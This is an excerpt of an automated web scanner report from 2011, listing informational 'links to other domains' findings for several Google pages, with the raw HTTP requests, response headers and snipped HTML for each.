...[SNIP]...
<div class=item><a id=m-research
href=http://finance.yahoo.com/q/rr?s=GES >
Research Reports</a>
...[SNIP]...
<div class=item><a id=m-annualreport
href=http://annualreports.com/partners/Report/21590 >
Annual Report (PDF)</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-24-2011.html" rel="nofollow" >Top Large Cap Stocks with Highest Upside Potential (Jan 24, 2011 ...</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/01/mid-caps-nvda-fslr-lulu-akam-slw.html" rel="nofollow" >Stock Market Analysis: Mid Caps ( NVDA, FSLR, LULU, AKAM, SLW )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://topstockspick.blogspot.com/2011/01/analyst-recommendation-strong-buy-rated_3972.html" rel="nofollow" >Top Stocks Pick: Analyst Recommendation &quot;Strong Buy&quot; Rated Mid Cap ...</a>
...[SNIP]...
<div class=sfe-break-top>
<a id=m-rprofile href="http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES" >
More from Reuters &raquo;
</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<div class=gb>
<a href="http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5" >
Full list on Reuters &raquo;</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

20.666. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/finance?hl=en&tab=we
The response contains the following links to other domains:
  • http://googlefinanceblog.blogspot.com/
  • http://online.wsj.com/article/BT-CO-20110124-708741.html
  • http://www.bloomberg.com/news/2011-01-24/rocktenn-agrees-to-acquire-smurfit-stone-container-for-about-3-5-billion.html
  • http://www.csmonitor.com/USA/Politics/2011/0124/State-of-the-Union-The-crafting-of-a-speech
  • http://www.ft.com/cms/s/0/b783d400-27c8-11e0-a327-00144feab49a.html
  • http://www.google.ca/finance
  • http://www.ibtimes.com/articles/104262/20110124/us-stocks.htm
  • http://www.nytimes.com/2011/01/25/business/25markets.html?src=busln
  • http://www.youtube.com/?hl=en&tab=e1

Request

GET /finance?hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:58 GMT
Expires: Mon, 24 Jan 2011 16:39:58 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span class=name>
<a href="http://www.ibtimes.com/articles/104262/20110124/us-stocks.htm" rel=nofollow id=n-hp- >US stocks advance in early&nbsp;trade</a>
...[SNIP]...
<div>
<a class=title href="http://www.csmonitor.com/USA/Politics/2011/0124/State-of-the-Union-The-crafting-of-a-speech" rel=nofollow id=n-hp- >State of the Union: The crafting of a speech</a>
...[SNIP]...
<div>
<a class=title href="http://www.ft.com/cms/s/0/b783d400-27c8-11e0-a327-00144feab49a.html" rel=nofollow id=n-hp- >Ackman to join JC Penney board</a>
...[SNIP]...
<div>
<a class=title href="http://www.bloomberg.com/news/2011-01-24/rocktenn-agrees-to-acquire-smurfit-stone-container-for-about-3-5-billion.html" rel=nofollow id=n-hp- >Rock-Tenn to Acquire Smurfit-Stone for $3.5 Billion</a>
...[SNIP]...
<div>
<a class=title href="http://online.wsj.com/article/BT-CO-20110124-708741.html" rel=nofollow id=n-hp- >S&amp;P Says More Downgrades Possible In 2011 Muni Bond Markets</a>
...[SNIP]...
<div>
<a class=title href="http://www.nytimes.com/2011/01/25/business/25markets.html?src=busln" rel=nofollow id=n-hp- >Wall Street Steady as Traders Take In More Earnings</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

20.667. http://www.google.com/imghp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /imghp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/imghp?hl=en&tab=wi
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=i1

Request

GET /imghp?hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.668. http://www.google.com/language_tools

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /language_tools

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/language_tools?hl=en
The response contains the following links to other domains:

Request

GET /language_tools?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:50 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><title>Language Tools</title><meta http-equiv="content-type" content="text/html;charset=UTF-8"><style>@import url(http://www.google.com/css/modules/g-flag.css);ol.g-flag {display: block;ov
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.669. http://www.google.com/prdhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /prdhp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/prdhp?hl=en&tab=wf
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=f1

Request

GET /prdhp?hl=en&tab=wf HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:53 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<noscript><meta http-equiv=refresh content="0; URL=/prdhp?hl=en&tab=wf&output=noj
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=f1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.670. http://www.google.com/preferences

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /preferences

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/preferences?hl=en
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=w1

Request

GET /preferences?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:50 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}h1,h2{display:inline;margin:0}h1{font-size
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.671. http://www.google.com/realtime

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /realtime

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/realtime?hl=en&tab=wY
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=Y1

Request

GET /realtime?hl=en&tab=wY HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:40:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="See up-to-the-second social updates about hot topics around the world.">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=Y1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.672. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg
The response contains the following links to other domains:
  • http://cnx.org/content/m10865/latest/
  • http://en.wikipedia.org/wiki/Electronic_commerce
  • http://erc.unesco.org/websitetoolkit/en/guide/p3.htm
  • http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx
  • http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD
  • http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&cd=1&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=5&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&cd=7&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&cd=8&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:KJLzPiEJ5goJ:www.health.state.mn.us/e-health/lawsmn.html+related:www.e&cd=9&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&cd=2&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:aLIFjmf3uFIJ:www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp+related:www.e&cd=4&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=3&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&cd=6&hl=en&ct=clnk&gl=us
  • http://www.eff.org/related/377/blog
  • http://www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp
  • http://www.health.state.mn.us/e-health/lawsmn.html
  • http://www.umbc.edu/wmst/forums.html
  • http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm
  • http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:15 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.e - Google Search</title><script>window.google={kEI:"b6s9TbnNEcSdgQeems2eCA",kEXPI:"17259,17291
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')">Research <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.umbc.edu/wmst/forums.html" class=l onmousedown="return clk(this.href,'','','','2','','0CCUQFjAB')">Women- and Gender-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','2','','0CCcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx" class=l onmousedown="return clk(this.href,'','','','3','','0CCkQFjAC')">Question <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=3&hl=en&ct=clnk&gl=us','','','','3','','0CC0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CC4QFjAD')">Timeline of Events <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aLIFjmf3uFIJ:www.fsis.usda.gov/Science/Ecoli_O157_Timeline/index.asp+related:www.e&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD" class=l onmousedown="return clk(this.href,'','','','5','','0CDEQFjAE')">PPSM 21 Technical Revisions <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=5&hl=en&ct=clnk&gl=us','','','','5','','0CDMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cnx.org/content/m10865/latest/" class=l onmousedown="return clk(this.href,'','','','6','','0CDQQFjAF')">The Circle of Fifths</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','6','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://erc.unesco.org/websitetoolkit/en/guide/p3.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')">UNESCO - Create and Maintain a Website and other IT-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','7','','0CDwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Electronic_commerce" class=l onmousedown="return clk(this.href,'','','','8','','0CD4QFjAH')">Electronic commerce - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','8','','0CEAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.health.state.mn.us/e-health/lawsmn.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEIQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:KJLzPiEJ5goJ:www.health.state.mn.us/e-health/lawsmn.html+related:www.e&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','9','','0CEQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.eff.org/related/377/blog" class=l onmousedown="return clk(this.href,'','','','10','','0CEYQFjAJ')"><em>
...[SNIP]...

20.673. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?hl=en&q=+site:MWJ_5AKtpypmg8&ved=0CDAQrAM
The response contains the following link to another domain:
  • http://www.youtube.com/results?hl=en&q=site:MWJ_5AKtpypmg8&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=+site:MWJ_5AKtpypmg8&ved=0CDAQrAM HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:15 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>site:MWJ_5AKtpypmg8 - Google Search</title><script>window.google={kEI:"b6s9TbqhH4SclgeTlOyQBw",kEXPI:"17259
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=site:MWJ_5AKtpypmg8&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.674. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp
The response contains the following link to another domain:
  • http://www.youtube.com/results?hl=en&resnum=5&q=p&um=1&ie=UTF-8&sa=N&tab=p1

Request

GET /search?hl=en&q=GMWJ_5AKtpypmg8&sa=X&oi=&ct=image&resnum=5&ved=0Csearch?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=bks:1&source=og&sa=N&tab=wp HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:14 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>GMWJ_5AKtpypmg8 p - Google Search</title><script>window.google={kEI:"bqs9TdLjFMP7lwfWhsTpBQ",kEXPI:"17259,1
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&resnum=5&q=p&um=1&ie=UTF-8&sa=N&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.675. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?hl=en&q=related:www.a&tbo=1&sa=X&ei=3wT0TMMWJ_5AKtpypmg8&ved=0CGEQHzA0BEKEI
The response contains the following links to other domains:
